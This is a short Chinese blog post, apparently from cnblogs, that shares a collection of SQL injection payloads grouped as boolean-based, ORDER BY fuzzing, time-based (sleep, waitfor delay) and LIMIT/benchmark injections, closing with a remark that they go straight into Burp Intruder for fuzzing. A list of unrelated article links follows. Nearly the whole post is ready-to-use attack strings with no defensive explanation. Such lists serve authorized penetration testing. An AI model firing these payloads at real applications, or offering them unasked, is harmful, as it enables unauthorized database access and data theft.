• 分享一些平时测试用的sql payloads

    1:BOOL SQLINJECTION


    '
    "
    %df'
    %df"
    and 1=1
    and 1=2
    ' and '1'='1
    ' and '1'='2
    " and "1"="1
    " and "1"="2
    ) and (1=1
    ) and (1=2
    ') and ('1'='1
    ') and ('1'='2
    %' and 1=1 and '%'='
    %' and 1=2 and '%'='x
    %') and 1=1 and ('%'='
    %') and 1=2 and ('%'='x
    OR 1=1
    OR 1=2
    ' OR 1=1-- -
    ' OR 1=2-- -
    ) OR 1=1-- -
    ) OR 1=2-- -
    ') OR 1=1-- -
    ') OR 1=2-- -
    " OR "1"="1
    " OR "1"="2
    ' OR '1'='1
    ' OR '1'='2
    ) OR (1=1
    ) OR (1=2
    ') OR ('1'='1
    ') OR ('1'='2

    2:ORDER BY SQLINJECTION fuzz payload

    (case when(1=1) then 1 else (select 1 union select 2) end)
    (case when(1=2) then 1 else (select 1 union select 2) end)
    ,(1-(case when(1=1) then 1 else (select 1 union select 2) end))
    ,(1-(case when(1=2) then 1 else (select 1 union select 2) end))
    ,1=if((1=1),1,(select 1 union select 2))
    ,1=if((1=2),1,(select 1 union select 2))
    ,If((1=1),1,(select 1 union select 2))-- -
    ,If((1=2),1,(select 1 union select 2))-- -
    ,If((1=1),sleep(4),(select 1 union select 2))-- -
    -IF((1=1),1,(SELECT 1 UNION SELECT 2))-- -
    -IF((1=2),1,(SELECT 1 UNION SELECT 2))-- -
    -(case when(1=1) then 1 else (select 1 union select 2) end)
    -(case when(1=2) then 1 else (select 1 union select 2) end)

    3:TIME-BASE SQLINJECTION

    '%2b(if((1=1 and sleep(4)),1,(select 1 union select 2)))%2b'a
    -IF((1=1),sleep(4),(SELECT 1 UNION SELECT 2))-- -
    ';(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
    ;SELECT sleep(4)
    );SELECT sleep(4)-- -
    ;SELECT sleep(4)-- -
    ;(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
    ' AND SLEEP(4)%23
    AND sleep(4)
    ' AND sleep(4) AND '1'='1
    ') AND sleep(4) AND ('1'='1
    ) AND sleep(4) AND (1=1
    " AND sleep(4) AND "1"="
    ') and (select(0)from(select(sleep(4)))x)-- -
    and (select(0)from(select(sleep(4)))x)
    and (select(0)from(select(sleep(4)))x) and 1=1
    ' and (select(0)from(select(sleep(4)))x) and '1'='1
    " and (select(0)from(select(sleep(4)))x) and "1"="1
    ) and (select(0)from(select(sleep(4)))x) and (1=1
    ') and (select(0)from(select(sleep(4)))x) and ('1'='1
    rlike (select(0)from(select(sleep(4)))x) and 1=1
    ' rlike (select(0)from(select(sleep(4)))x) and '1'='1
    ) rlike (select(0)from(select(sleep(4)))x) and (1=1
    ') rlike (select(0)from(select(sleep(4)))x) and ('1'='1
    ;waitfor delay '0:0:4' -- -
    ';waitfor delay '0:0:4' -- -
    );waitfor delay '0:0:4' -- -
    ');waitfor delay '0:0:4' -- -
    if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
    (SELECT * FROM(SELECT(sleep(4)))lWuP)

    4:LIMIT SQLINJECTION 

    procedure analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)

    用法就不用多说,放burp instuder fuzz 就行了
  • 相关阅读:
    第九次训练赛
    什么是 Catalan 数列以及其应用
    Python pip 安装与使用
    HDU 1179:Ollivanders: Makers of Fine Wands since 382 BC.
    身份证信息
    流量暴增,掌门教育如何基于 Spring Cloud Alibaba 构建微服务体系?
    从零入门 Serverless | 函数计算的可观测性
    如何管理越来越多的 operator?OLM 给你答案
    Fluid: 让大数据和 AI 拥抱云原生的一块重要拼图
    SpringCloud 应用在 Kubernetes 上的最佳实践 — 线上发布(可监控)
  • 原文地址:https://www.cnblogs.com/depycode/p/5576204.html
Copyright © 2020-2023  润新知